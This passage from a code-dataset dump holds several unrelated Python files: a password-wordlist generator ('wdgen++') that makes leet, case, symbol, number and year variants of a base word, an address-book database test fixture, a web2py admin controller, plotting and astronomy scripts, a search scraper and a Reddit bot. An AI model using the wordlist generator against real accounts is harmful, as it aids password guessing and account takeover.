vogalup=\"\"\n for a in base:\n if a in let:\n vogalup+=a.upper()\n else:\n vogalup+=a\n\n\n\ndef base_upper():\n global baseup\n baseup=base.upper()\n\ndef leet_parcialupper():\n global bleetpacial\n bleetpacial=\"\"\n for a in base:\n if a in leters:\n bleetpacial+=a.upper()\n else:\n bleetpacial+=a\n baseleet=bleetpacial.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n bleetpacial=baseleet.replace(\"o\",\"0\")\n\ndef especial_substituir():\n global esp1\n global esp2\n global esp3\n global esp4\n global esp5\n global esp6\n global esp7\n global esp8\n global esp9\n global esp10\n esp1=base.replace(\"a\",\"@\")\n esp2=base.replace(\"e\",\"&\")\n esp3=base.replace(\"e\",\"€\")\n esp4=base.replace(\"s\",\"$\")\n esp5=base.replace(\"c\",\"¢\")\n esp6=esp1.replace(\"e\",\"&\")\n esp7=esp1.replace(\"e\",\"€\")\n esp8=esp7.replace(\"c\",\"¢\")\n esp9=esp4.replace(\"a\",\"@\")\n esp10=esp8.replace(\"s\",\"$\")\n\ndef youiscomplicated():\n global comp1\n global comp2\n global comp3\n global comp4\n global comp5\n global comp6\n global comp7\n global comp8\n global comp9\n global comp10\n global comp11\n global comp12\n comp1=base.replace(\"a\",\"A\")\n comp2=comp1.replace(\"e\",\"3\")\n comp3=comp2.replace(\"o\",\"0\")\n comp4=comp3.replace(\"s\",\"5\")\n comp5=base.replace(\"e\",\"E\")\n comp6=comp5.replace(\"a\",\"4\")\n comp7=comp6.replace(\"o\",\"0\")\n comp8=comp7.replace(\"s\",\"5\")\n comp9=base.replace(\"o\",\"O\")\n comp10=comp9.replace(\"a\",\"4\")\n comp11=comp10.replace(\"e\",\"3\")\n comp12=comp11.replace(\"s\",\"5\")\n\ndef up_fist():\n global first_letter\n first_letter = base.replace(base[0],base[0].upper())\n\ndef up_up():\n global fim\n fim=\"\"\n cont=0\n for a in base:\n if cont%2 == 0:\n fim+=a.replace(a,a.upper())\n else:\n fim+=a\n cont+=1\n\n\ndef parcial_upper_leet():\n global leters\n leters=[\"b\",\"c\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"m\",\"n\",\"p\",\"q\",\"r\",\"s\",\"t\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n global baseupperleet\n baseupperleet=\"\"\n for a in base:\n if a in leters:\n baseupperleet+=a.upper()\n else:\n if a == \"a\":\n baseupperleet+=a.replace(\"a\",\"4\")\n elif a == \"e\":\n baseupperleet+=a.replace(\"e\",\"3\")\n elif a == \"o\":\n baseupperleet+=a.replace(\"o\",\"0\")\n elif a == \"i\":\n baseupperleet+=a.replace(\"i\",\"!\")\n\nleet_lite()\nleet_medio()\nleet_foda()\nbase_parcial_upper()\nvogalupper()\nbase_upper()\nleet_parcialupper()\nespecial_substituir()\nyouiscomplicated()\nup_fist()\nup_up()\nparcial_upper_leet()\n\nif not baseleetlite in wdbase:\n wdbase+=[baseleetlite]\nif not baseleetmedio in wdbase:\n wdbase+=[baseleetmedio]\nif not baseupper in wdbase:\n wdbase+=[baseupper]\nif not baseup in wdbase:\n wdbase+=[baseup]\nif not bleetpacial in wdbase:\n wdbase+=[bleetpacial]\n\nwdbase+=[first_letter]\n\nwdbase+=[base]\n\nwdbase+=[esp1,esp2,esp3,esp4,esp5,esp6,esp7,esp8,esp9,esp10]\n\nwdbase+=[esp1.upper(),esp2.upper(),esp3.upper(),esp4.upper(),esp5.upper(),esp6.upper(),esp7.upper(),esp8.upper(),esp9.upper(),esp10.upper()]\n\nwdbase+=[comp1,comp2,comp3,comp4,comp5,comp6,comp7,comp8,comp9,comp10,comp11]\n\nwdbase+=[fim,baseupperleet]\n\ndef rm_repete():\n for a in wdbase:\n if wdbase.count(a) > 1:\n while not wdbase.count(a) == 1:\n wdbase.remove(a)\n\nrm_repete()\n\nfor a in wdbase:\n wordlist.write(a+\"\\n\")\n wordlist.write(a+\"@\\n\")\n wordlist.write(a+\"#\\n\")\n wordlist.write(a+\"$\\n\")\n wordlist.write(a+\"%\\n\")\n wordlist.write(a+\"&\\n\")\n wordlist.write(a+\"_\\n\")\n wordlist.write(a+\"_@\\n\")\n wordlist.write(a+\"_#\\n\")\n wordlist.write(a+\"_$\\n\")\n wordlist.write(a+\"_%\\n\")\n wordlist.write(a+\"_&\\n\")\n\ncont=0\nfor a in wdbase:\n cont=0\n while not cont == 100:\n wordlist.write(a+str(cont)+\"\\n\")\n #if you need,Put \"#\" (comment) in one of these two lines below\n wordlist.write(a+\"_\"+str(cont)+\"\\n\")\n wordlist.write(a+\"-\"+str(cont)+\"\\n\")\n cont+=1\n\n\n#if you wanna edit for decrease or increase the number of wordlist,\n#edit the var cont1.\n\ncont1=1970\nfor a in wdbase:\n cont1=1970\n while not cont1 == 2021:\n wordlist.write(a+str(cont1)+\"\\n\")\n wordlist.write(a+\"_\"+str(cont1)+\"\\n\")\n wordlist.write(a+\"-\"+str(cont1)+\"\\n\")\n cont1+=1\n\n\nfor a in wdbase:\n contf=100\n while not contf == 999:\n wordlist.write(a+str(contf)+\"\\n\")\n #wordlist.write(a+\"_\"+str(contf)+\"\\n\")\n #wordlist.write(a+\"-\"+str(contf)+\"\\n\")\n contf+=1\n\ncont=100\nwhile not cont == 1000:\n #wordlist.write(base+str(cont)+\"\\n\")\n cont+=1\n\n\nprint(\"\\n\\nIf you think tht the wordlists gerated is very big, please, edit de source code of the wdgen++ in script/wdgen++/wdgen++.py\\n\\n\")\n\ntime.sleep(2)\n","sub_path":"scripts/wdgen++/wdgen++.py","file_name":"wdgen++.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"273932159","text":"#\n# This is the Robotics Language compiler\n#\n# Language.py: Definition of the language for this package\n#\n# Created on: 19 February, 2019\n# Author: Gabriel Lopes\n# Licence: license\n# Copyright: copyright\n#\n\nlanguage = {}\n\ndefault_output = ''","sub_path":"RoboticsLanguage/Outputs/FaultDetectionHeartbeat/Language.py","file_name":"Language.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58421064","text":"\nimport pymysql.cursors\nfrom model.group import Group\nfrom model.add_new import AddNew\nimport re\n\nclass DbFixture:\n\n def __init__(self, host, name, user, password):\n self.host = host\n self.name = name\n self.user = user\n self.password = password\n self.connection = pymysql.connect(host=host, database=name, user=user, password=password, autocommit=True)\n # autocommit убирает кэширование в базе, чтобы после изменений в проверках обновлялось количество групп\n\n def get_group_list(self):\n list = []\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select group_id, group_name, group_header, group_footer from group_list\")\n for row in cursor:\n (id, name, header, footer) = row\n list.append(Group(id=str(id), name=name, header=header, footer=footer))\n finally:\n cursor.close()\n return list\n\n\n def get_contact_list(self):\n list = []\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id, firstname, lastname, address, home, mobile, work, email, email2, email3, phone2 from addressbook where deprecated='0000-00-00 00:00:00'\")\n for row in cursor:\n (id, firstname, lastname, address, home, mobile, work, email, email2, email3, phone2) = row\n current_contact = AddNew(my_id=str(id), my_f_name=firstname, my_l_name=lastname, my_home_address=address,\n my_h_telefon=home, my_mobile=mobile, my_work_telefon=work, my_secondary_phone=phone2,\n my_company_mail=email, my_second_mail=email2, my_third_mail=email3\n )\n final_contact = AddNew(my_id=str(id), my_f_name=self.removing_spaces(firstname),\n my_l_name=self.removing_spaces(lastname),\n my_home_address=self.removing_spaces(address)\n )\n final_contact.all_phones_from_home_page = self.merge_phones_like_on_home_page(current_contact)\n final_contact.all_emails_from_home_page = self.merge_emails_like_on_home_page(current_contact)\n list.append(final_contact)\n\n finally:\n cursor.close()\n return list\n\n\n def destroy(self):\n self.connection.close()\n\n def clear(self, s):\n return re.sub(\"[() -]\", \"\", s)\n\n def merge_phones_like_on_home_page(self, contacts):\n # filter - удаляем элементы None, map - чистим контакты от лишних символов, filter - выбираем только не пустые значения\n return \"\\n\".join(filter(lambda x: x != \"\",\n map(lambda x: self.clear(x),\n filter(lambda x: x is not None,\n [contacts.my_h_telefon, contacts.my_mobile, contacts.my_work_telefon,\n contacts.my_secondary_phone]))))\n\n def merge_emails_like_on_home_page(self, contacts):\n # filter - удаляем элементы None, map - чистим контакты от лишних символов, filter - выбираем только не пустые значения\n return \"\\n\".join(filter(lambda x: x != \"\",\n map(lambda x: self.clear(x),\n filter(lambda x: x is not None,\n [contacts.my_company_mail, contacts.my_second_mail, contacts.my_third_mail]))))\n\n def removing_spaces(self, s):\n return re.sub(\" \", \" \", s.strip())","sub_path":"fixture/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30567154","text":"\"\"\"\nA controller holding functions that are accessible only to managers\n\n\n## - manage_groups \n\n## - manage_users\n## - manage_users_approve\n## - manage_users_deny\n\n## - manage_innovations\n## - manage_innovations_approve\n\n## - new_product_category\n## - list_product_category\n## - edit_product_category\n\n## - new_value_chain\n## - list_value_chain\n## - edit_value_chain\n\n## - new_enterprise_size\n## - list_enterprise_size\n## - edit_enterprise_size\n\n## - new_type\n## - list_type\n## - edit_type\n\n## - new_ipr_protection\n## - list_ipr_protection\n## - edit_ipr_protection\n\n## - new_application\n## - list_application\n## - edit_application\n\n## - new_organization\n## - list_organization\n## - edit_organization\n\n\"\"\"\n\n\nimport re, time, datetime\n#-------------------------MANAGERS BLOC----------------------------\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_groups():\n return dict(form=SQLFORM.grid(db.auth_membership, csv=False, searchable=False, editable=False))\n\n#--------------------------MANAGE NEW USERS------------------------\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users():\n \"\"\"\n list all users that have registration_key = 'pending'\n these are users who registered, but was not approved by admin\n \"\"\"\n query = (db.auth_user.registration_key == 'pending')\n new_users = db(query).select(db.auth_user.id\n ,db.auth_user.first_name\n ,db.auth_user.last_name\n ,db.auth_user.email\n ,db.auth_user.organization_name\n )\n\n query = (db.auth_user.registration_key == '')\n existing_users = db(query).select(db.auth_user.id\n ,db.auth_user.first_name\n ,db.auth_user.last_name\n ,db.auth_user.email\n ,orderby=db.auth_user.last_name\n )\n if not (new_users or existing_users):\n session.flash = 'There are no users to approve.'\n redirect(URL('default', 'index'))\n return dict(new_users=new_users, existing_users=existing_users)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_approve():\n form = SQLFORM.factory(\n Field(\n 'first_name',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.first_name).first().first_name,\n writable=False,\n ),\n Field(\n 'last_name',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.last_name).first().last_name,\n writable=False,\n ),\n Field(\n 'email',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.email).first().email,\n writable=False,\n ),\n Field(\n 'user_comments',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.organization_name).first().organization_name,\n writable=False,\n ),\n Field(\n 'organization',\n requires=IS_IN_DB(db, db.organization.id, '%(name)s')\n ),\n )\n if form.process().accepted:\n db(db.auth_user.id == request.args(0, cast=int)).update(organization_id=form.vars.organization)\n db(db.auth_user.id == request.args(0, cast=int)).update(registration_key='')\n session.flash = 'User Approved'\n redirect(URL('managers', 'manage_users'))\n return dict(form=form)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_deny():\n db(db.auth_user.id == request.args(0, cast=int)).delete()\n session.flash = 'User Denied.'\n redirect(URL('managers', 'manage_users'))\n return None\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_block():\n db(db.auth_user.id == request.args(0, cast=int)).update(registration_key='blocked')\n session.flash = 'User Blocked.'\n redirect(URL('managers', 'manage_users'))\n return None\n#------------------------------------------------------------------\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_innovations():\n \"\"\"\n list all innovations that have flag is_approve = FALSE\n \"\"\"\n query = (db.innovation.is_approved == '0')\n results = db(query).select(db.innovation.id\n , db.innovation.name\n , db.innovation.created_on\n , db.innovation.created_by\n , orderby=~db.innovation.created_on)\n if not results:\n session.flash = 'There are no innovations to approve.'\n redirect(URL('default', 'index'))\n return dict(results=results)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_innovations_approve():\n \"\"\"\n event: button 'approve' was clicked on 'manage_innovations' form\n update flag is_approved to TRUE for corresponding innovation.id\n \"\"\"\n db(db.innovation.id == request.args(0, cast=int)).update(is_approved='1')\n backup() # call backup function from db_zef.py model to backup entire database\n session.flash = 'Innovation Approved.'\n redirect(URL('managers', 'manage_innovations'))\n return None\n#------------------------------------------------------------------\n\n\n# ------------------ View and Edit Dictionaries -------------\n@auth.requires_login()\ndef new_product_category():\n form = SQLFORM(db.product_category)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_product_category'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_product_category():\n results = db(db.product_category).select(db.product_category.ALL, \\\n orderby=[db.product_category.level_1, \\\n db.product_category.level_2, \\\n db.product_category.level_3])\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_product_category():\n form = SQLFORM(db.product_category, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_product_category'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_value_chain():\n form = SQLFORM(db.value_chain)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_value_chain'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_value_chain():\n results = db(db.value_chain).select(db.value_chain.ALL, orderby=db.value_chain.order_priority)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_value_chain():\n form = SQLFORM(db.value_chain, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_value_chain'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_enterprise_size():\n form = SQLFORM(db.enterprise_size)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_enterprise_size'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_enterprise_size():\n results = db(db.enterprise_size).select(db.enterprise_size.ALL, orderby=db.enterprise_size.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_enterprise_size():\n form = SQLFORM(db.enterprise_size, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_enterprise_size'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_type():\n form = SQLFORM(db.type)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_type'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_type():\n results = db(db.type).select(db.type.ALL, orderby=db.type.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_type():\n form = SQLFORM(db.type, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_type'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_ipr_protection():\n form = SQLFORM(db.ipr_protection)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_ipr_protection'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_ipr_protection():\n results = db(db.ipr_protection).select(db.ipr_protection.ALL, orderby=db.ipr_protection.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_ipr_protection():\n form = SQLFORM(db.ipr_protection, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_ipr_protection'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_application():\n form = SQLFORM(db.application)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_application'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_application():\n results = db(db.application).select(db.application.ALL, orderby=db.application.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_application():\n form = SQLFORM(db.application, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_application'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_organization():\n form = SQLFORM(db.organization)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_organization'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_organization():\n results = db(db.organization).select(db.organization.ALL, orderby=db.organization.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_organization():\n form = SQLFORM(db.organization, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_organization'))\n return dict(form=form)\n# ------------------ end of View and Edit Dictionaries -------------\n","sub_path":"controllers/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"477446409","text":"from eim.settings_loader import GeneralSettings, DataSettings\nfrom eim.common import DictClass\nfrom eim.data import loadData\nfrom eim.spike_train import train_sec2ms\nfrom figure_helper import plotSTPFig\nimport matplotlib.pyplot as plt\n\n\n########## PLOTTING SETTINGS ##########\ntrain_start_time_ms = 0\ntrain_end_time_ms = 2500\nmax_nrns_to_plot = 200\n#################################################\n\n########## LOAD DATA ##########\nter = DictClass(loadData('results/testing_short.shelf'))\nted = DictClass(loadData('data/testing_short.shelf'))\nanr = DictClass(loadData('results/analysis.shelf'))\n#################################################\n\n# LOAD SETTINGS\ngs = GeneralSettings()\nds = DataSettings(gs.dataPath + gs.dataSettings)\n\n# PREPARE\nIDs = ds.patternIDs\ntrain = ted.train\npd = train.pd\npatlen = train.patlen\npc = [(0.0, 0.3, 1.0), (0.0, 0.8, 0.0)]\n\n# input neurons spikes\nspikesIN_ms = train_sec2ms(ter.spikes['in'])[::2] # take every 2nd\n\n# excitatory neurons spikes\nspikesE_ms = train_sec2ms(ter.spikes['e'])\n# pattern prefered neurons - spikes\nP1_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_inds_P1]\nP2_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_inds_P2]\n#non prefered neurons - subset\nrest_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_nondist][:max_nrns_to_plot - len(P1_spikesE_ms)-len(P2_spikesE_ms)]\n\n# inhibitory neurons spikes\nspikesI_ms = train_sec2ms(ter.spikes['i'])[::2] # take every 2nd\n\n\n# PLOT FIGURE\nplotSTPFig(train, pd, patlen, ted.pg, \n\t\t train_start_time_ms, train_end_time_ms, IDs, pc, \n\t\t spikesIN_ms, P1_spikesE_ms, P2_spikesE_ms, rest_spikesE_ms, spikesI_ms, \n\t\t anr.nrntracesP1_P1, anr.nrntracesP1_P2, anr.nrntracesP2_P1, anr.nrntracesP2_P2)\n\n# SAVE FIGURE\nplt.savefig('plots/fig.png', dpi=600)\nplt.savefig('plots/fig.eps')\n","sub_path":"simulations/stp/show_figure.py","file_name":"show_figure.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"352674979","text":"from math import sqrt\n\nPRIMELIST = [2,3]\n\ndef intInput(msg, errmsg):\n while True:\n try:\n return int(input(msg))\n except ValueError:\n print(errmsg)\n\ndef isPrime(n):\n global PRIMELIST\n \n for p in PRIMELIST:\n if n%p == 0:\n return False\n elif p >= sqrt(n):\n return True\n \ndef finder(limit):\n global PRIMELIST\n \n p = PRIMELIST[len(PRIMELIST)-1]\n while p <= limit:\n p+=2\n if isPrime(p):\n PRIMELIST.append(p)\n \ndef main():\n finder(intInput(\"Enter limit: \", \"Not an integer!\"))\n print(PRIMELIST)\n\nmain()\n","sub_path":"asd.py","file_name":"asd.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"88727586","text":"#_*_ coding:utf-8 _*_\n__author__ = \"Ink.white\"\n\nimport urllib.request\nimport re\n\nkw = \"apple\"\nkw = urllib.request.quote(kw)\nfor i in range(1,11):\n url = \"https://www.baidu.com/s?wd=\"+kw+\"&pn=\"+str((i-1)*10)\n pat1 = \"'title':'(.*?)',\"\n pat2 = '\"title\":\"(.*?)\",'\n data = urllib.request.urlopen(url).read().decode(\"utf-8\")\n\n result1 = re.compile(pat1).findall(data)\n result2 = re.compile(pat2).findall(data)\n for z in range(0,len(result1)):\n print(result1[z])\n\n for x in range(0,len(result2)):\n print(result2[x])","sub_path":"Python3网络爬虫视频练习/爬虫_模拟httpGetRequest.py","file_name":"爬虫_模拟httpGetRequest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"87040466","text":"import praw\nimport json\nfrom collections import defaultdict\nfrom google.cloud import storage\nimport hashlib\nfrom OAuthor import *\nfrom BotService import *\n\n\nclass RedditBot:\n\n # if OAuth is not already created, need to call OAuth script\n def __init__(self, path: str, gcp: bool = True, testing: bool = False):\n self.path = path\n if not testing:\n if gcp:\n self.config = self.loadRemoteConfig(path)\n\n else:\n self.config = self.loadLocalConfig(path)\n\n auth = self.isUnauthorized()\n print(\"authorized: \", self.isUnauthorized())\n\n # TODO check valid status and configure error message\n # do this in pytest?\n\n self.services = self.configureServices()\n print(\"Services: \", self.services)\n self.client = self.authenticate()\n\n # TODO - generate empty output structure if no file exists for output\n\n # TODO - check for previous post logs to read in\n # or just read in previous output data object for incrementing\n self.post_log = defaultdict(lambda: {\"visited\": 0, \"date\": None})\n else:\n self.services = None\n self.config = None\n self.client = None\n self.post_log = None\n\n # replace with loadRemote once GCP is implemented\n def loadLocalConfig(self, path: str):\n print(\"loading config\")\n with open(path, 'r') as f:\n return json.load(f)\n\n # check to see if we have client_id and client_secret\n def isUnauthorized(self):\n if not self.config['auth']['client_id'] or not self.config['auth']['client_secret']:\n return self.generateOAuth()\n elif self.config['auth']['client_id'].isspace() or self.config['auth']['client_secret'].isspace():\n return self.generateOAuth()\n elif self.config['auth']['client_id'] == self.config['auth']['client_secret']:\n return self.generateOAuth()\n else:\n self.config['status']['online'] = True\n self.updateRemoteConfig()\n return True\n\n # log in to reddit\n def authenticate(self):\n print(\"authenticating client\")\n return praw.Reddit(client_id=self.config['auth']['client_id'],\n client_secret=self.config['auth']['client_secret'],\n password=self.config['auth']['password'],\n user_agent=self.config['auth']['user_agent'],\n username=self.config['auth']['username'])\n\n # create BotService objects from config parameters\n def configureServices(self):\n services = self.config['services']\n service_objects = []\n print(\"configureServices\")\n for service in services:\n if 'fandom' in service['service_name']:\n service_objects.append(FandomService(service))\n elif \"translate\" in service['service_name']:\n service_objects.append(TranslateService(service))\n return service_objects\n\n # call each service's .run() method on each subreddit\n def run(self):\n try:\n print('+'.join(self.config['subreddits']))\n for comment in self.client.subreddit('+'.join(self.config['subreddits'])).stream.comments(skip_existing=True):\n for service in self.services:\n service.run(comment)\n except:\n self.config['status']['online'] = False\n self.updateRemoteConfig()\n\n # read the config file from GCP\n def loadRemoteConfig(self, gcp_url: str):\n storage_client = storage.Client.from_service_account_json(\n './credentials/baas.json')\n blobs = storage_client.list_blobs('bot-configurations')\n for blob in blobs:\n print(blob.name)\n if blob.name == self.path:\n json_data = blob.download_as_string(\n client=None).decode(\"utf-8\")\n return json.loads(json_data)\n bucket = storage_client.get_bucket('bot-configurations')\n try:\n blob = bucket.get_blob(self.path + '.json')\n except:\n blob = bucker.get_blob(self.path)\n\n json_data = blob.download_as_string(client=None).decode(\"utf-8\")\n return json.loads(json_data)\n\n # update config file with status['online'] = True (and status['valid'] = True ?)\n # populate the OAuth fields for the config update\n def updateRemoteConfig(self):\n storage_client = storage.Client.from_service_account_json(\n \"./credentials/baas.json\")\n bucket = storage_client.get_bucket('bot-configurations')\n blobs = storage_client.list_blobs('bot-configurations')\n for blob in blobs:\n print(blob.name)\n if blob.name == self.path:\n blob.upload_from_string(json.dumps(self.config, indent=2))\n return\n\n # hasher = hashlib.md5()\n # hasher.update(bytes(self.config['auth']['username'],\"utf-8\"))\n # blob = bucket.blob(self.path)\n # blob.upload_from_string(json.dumps(self.config,indent=2))\n\n def generateOAuth(self):\n\n author = OAuthor(self.config['auth'], self.config['version_info'])\n client_id, client_secret = author.mechanizedLogin()\n # = author.retrieveTokens()\n if client_secret == client_id:\n # print(\"something went wrong, OAuth not present\")\n # time.sleep(5)\n # author.createApp()\n # client_secret, client_id = author.retrieveTokens()\n # # author.deleteApp()\n # author.powerDown()\n # self.config['auth']['client_id'] = client_id\n # self.config['auth']['client_secret'] = client_secret\n # self.updateRemoteConfig()\n return False\n else:\n self.config['auth']['client_id'] = client_id\n self.config['auth']['client_secret'] = client_secret\n self.config['status']['online'] = True\n self.client = self.authenticate()\n if self.client.user.me() == self.config['auth']['username']:\n self.updateRemoteConfig()\n return True\n\n # TODO - read/write service data to GCP\n\n def postOutputData(self, gcp_url: str):\n # should I log direct messages and responses here or separately?\n pass\n\n def pullOutputData(self, gcp_url: str):\n pass\n\n # TODO - check if a reddit app exists on this account already. if so, just grab the credentials\n\n def hasApp(self):\n pass\n\n\nif __name__ == '__main__':\n r = RedditBot(\"9f05059f393732565ec85b18c5d05866\", gcp=True)\n r.run()\n\n# \tpass\n","sub_path":"back_end/python-bot/RedditBot.py","file_name":"RedditBot.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"114435267","text":"import os\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom astropy.visualization import (ZScaleInterval, ImageNormalize)\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport csv\n\n#global variables\ncutout_dir = os.path.expandvars(\"$SCRATCH\") + \"/\"\nimage_dir = \"/home/anahoban/projects/rrg-kyi/astro/cfis/W3/\"\n\n#with open(cutout_dir + 'tiles_5channel_41tiles.csv', newline='') as f:\n # reader = csv.reader(f)\n # data = list(reader)\n \n#tile_ids = [i[0] for i in data]\n\ndef get_test_cutouts(index, tile_ids, n_cutouts, cutout_size, bands=\"cfis\", start=0):\n n = 0\n if bands == \"all\":\n band_indices = [0, 1, 2, 3, 4]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n \n elif bands == \"cfis\":\n band_indices = [2]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n else: # PS1\n band_indices = [1, 3, 4]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n img_group = hf.get(tile_ids[index] + \"/IMAGES\")\n wt_group = hf.get(tile_ids[index] + \"/WEIGHTS\")\n for i in range(start, len(img_group)):\n sources[n,:,:,:] = np.array(img_group.get(f\"c{i}\"))[:,:,band_indices]\n weights[n,:,:,:] = np.array(wt_group.get(f\"c{i}\"))[:,:,band_indices]\n n += 1\n if n == n_cutouts:\n #return sources #if no weights\n return np.concatenate((sources, weights),axis=-1) #if we train with weights\n \ndef get_cutouts(hf, tile_ids,tile_indices, batch_size, cutout_size, bands=\"all\"):\n ''' Input: hf file, tile indices, batch size, dimensions, band and bands\n Output: the img and weight cutouts for the test set as (batch_size, pix, pix, channels) '''\n b = 0 # counter for batch\n if bands == \"all\":\n band_indices = [0, 1, 2, 3, 4]\n elif bands == \"cfis\":\n band_indices = [2]\n l = len(band_indices)\n elif bands == \"ps1\":\n band_indices = [1, 3, 4]\n else:\n print('WARNING: unrecognized band')\n band_indices = [0] \n \n l = len(band_indices)\n sources = np.zeros((batch_size, cutout_size, cutout_size, l))\n weights = np.zeros((batch_size, cutout_size, cutout_size, l))\n while True:\n for i in tile_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\")\n wt_group = hf.get(tile_ids[i] + \"/WEIGHTS\")\n n_cutouts = len(img_group)\n for n in range(n_cutouts):\n sources[b,:,:,:] = np.array(img_group.get(f\"c{n}\"))[:,:,band_indices]\n weights[b,:,:,:] = np.array(wt_group.get(f\"c{n}\"))[:,:,band_indices]\n b += 1\n if b == batch_size:\n b = 0\n #yield (sources,sources)# no weights\n yield (np.concatenate((sources, weights), axis = -1), sources) #with weights\n \n \ndef train_autoencoder(hf, tile_ids, model, train_indices, val_indices, n_epochs, batch_size, cutout_size, all_callbacks, bands=\"all\"):\n n_cutouts_train = 0\n for i in train_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\") \n n_cutouts_train += len(img_group)\n \n n_cutouts_val = 0 \n for i in val_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\") \n n_cutouts_val += len(img_group)\n \n train_steps = n_cutouts_train // batch_size\n val_steps = n_cutouts_val // batch_size\n \n history = model.fit(get_cutouts(hf, tile_ids, train_indices, batch_size, cutout_size, bands), \n epochs=n_epochs, steps_per_epoch=train_steps, \n validation_data=get_cutouts(hf, tile_ids, val_indices, batch_size, cutout_size, bands), \n validation_steps=val_steps, callbacks= all_callbacks)\n return model, history\n\ndef create_autoencoder2(shape):\n input_all = keras.Input(shape=shape)\n weights = 